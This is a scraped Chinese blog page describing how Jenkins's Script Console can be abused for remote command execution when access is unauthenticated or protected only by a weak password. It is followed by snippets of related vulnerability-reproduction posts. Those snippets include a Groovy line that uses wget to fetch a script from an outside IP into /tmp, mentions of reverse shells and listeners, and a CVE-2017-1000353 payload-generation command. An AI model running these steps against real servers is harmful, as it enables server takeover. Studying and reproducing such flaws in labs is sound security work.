Jenkins功能未授权访问导致的远程命令执行漏洞

最新推荐文章于 2025-01-21 16:47:47 发布
最新推荐文章于 2025-01-21 16:47:47 发布
阅读量3.3k 收藏 1
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/limb0/article/details/103185649
版权
本文详细介绍了Jenkins系统管理中的'脚本命令行'功能,指出由于可能存在的未授权访问或弱口令,攻击者能够执行任意系统命令,对服务器造成严重影响。建议采取措施屏蔽未授权IP访问或加强Jenkins验证来修复此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Jenkins功能未授权访问导致的远程命令执行漏洞

一、漏洞介绍

Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在未授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。

二、漏洞危害

三、漏洞验证

找到“系统管理”——“脚本命令行”。
在这里插入图片描述
在这里插入图片描述

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the println command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example:
println(Jenkins.instance.pluginManager.plugins)
A

最低0.47元/天 解锁文章
Jenkins远程命令执行漏洞(CVE-2018-1000861复现)
墨痕诉清风的博客
11-06 2326
其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下。(3).然后在我们接收shell的机器上监听之前写的端口。...
Jenkins未授权访问漏洞
a6458360的博客
08-03 1140
文章目录 一、漏洞介绍 1.1 Jenkins介绍 1.2 漏洞原因 1.3 利用条件 二、环境配置 2.1 配置主机 2.2 下载安装 三、漏洞利用 3.1 信息收集 3.2 漏洞利用 四、防御建议 一、漏洞介绍 1.1 Jenkins介绍 Jenkins是一个基于Java开发的开源项目,可在Tomcat等流行的servlet容器中运行,也可以独立运行,其功能如下: 用于持续性、自动的构建/测试软件 项目监控或跑一些定时任务 监控外部调用执行的工作
最全Jenkins未授权访问漏洞&命令执行(1),2024年最新物联网嵌入式开发端简单易用的SPI框架
2401_85015306的博客
05-15 368
生成字节码命令。
Jenkins未授权访问漏洞&命令执行
热门推荐
qq_45434762的博客
03-28 1万+
Jenkins未授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
#漏洞挖掘# 一文了解什么是Jenkins未授权访问!!!
最新发布
soc的博客
01-21 950
Jenkins 是一个开源的持续集成(Continuous Integration, CI)和持续交付(Continuous Delivery, CD)工具。它的主要目的是通过自动化构建、测试和部署流程,提高软件开发的效率和质量。Jenkins 是一个可扩展的持续集成引擎,旨在提供一个开放易用的软件平台,使软件的持续集成变得可能。它通过自动化重复性任务,如构建、测试和部署,来减少开发人员的工作负担,从而提高开发效率。
jenkins 未授权访问-任意命令执行
weixin_33841503的博客
08-09 771
jenkins 未授权访问-任意命令执行 0x00 jenkins简介 enkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 0x01 漏洞原因 jenkins 未设置帐号密码,或者使用了弱帐号密码 0x02 漏洞复现 在默认...
Jenkins未授权访问+命令执行
m0_49577923的博客
11-11 5986
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins未授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户未授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
Jenkins未授权访问漏洞&命令执行
2401_85014013的博客
05-17 611
进入Script Console之后是一个执行脚本的页面查询当前用户查看IP配置信息。
jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 1021
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 561
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
未授权访问漏洞
m0_63944205的博客
08-04 733
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,DockerCLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1598
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
Jenkins未授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 2186
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就未授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令行执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
Jenkins远程代码执行漏洞CVE-2017-1000353
公众号shadow sock7
01-31 3119
复现环境: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 复现 使用Intellij Idea打包java为可执行jar包参考: https://blog.csdn.net/xuemengrui12/article/details/74984731 ...
Jenkins未授权访问脚本执行漏洞
weixin_30883777的博客
05-17 747
Jenkins未授权访问脚本执行漏洞 步骤 首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录: println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text 执行成功下面Result并没有反馈 然后我们执行命令允许反弹shell脚本 println "python...
Jenkisn远程执行Shell命令
wildkid
07-10 1480
系统管理Manage Jenkins->管理插件Plugin Manager->搜索SSH plugin并安装。
未授权访问Jenkins未授权访问漏洞
qq_68163788的博客
05-10 3410
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个未授权访问漏洞,即攻击者可以通过未经授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
安装Jenkins实例似乎已离线详细解决步骤
Hi_alan的博客
10-04 4151
如果你也遇到这种情况,请务必完整的看下去 今天跟着视频做Jenkins部署的时候,Linux一切都配置好了,然后输入地址可以正常访问,输入密码后,出现OffLine页面,下面是翻译成中文的提示框: 这个明显的跟视频中的界面不一样,没有安装插件的界面,虽然此时心里有点小疑惑,明明一样的版本,为什么会不一样了,但是没有仔细深究直接跳过插件安装。来到界面之后,根据视频的讲解一步一步的安装 ①点击Jenk...
Jenkins绕过沙箱漏洞远程代码执行分析
由于插件可以访问Jenkins核心功能,因此插件中包含的漏洞可能导致严重的安全问题。 5. CVE-2018-1000861:文档中提及了CVE编号CVE-2018-1000861。CVE(Common Vulnerabilities and Exposures)是一份标准化的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值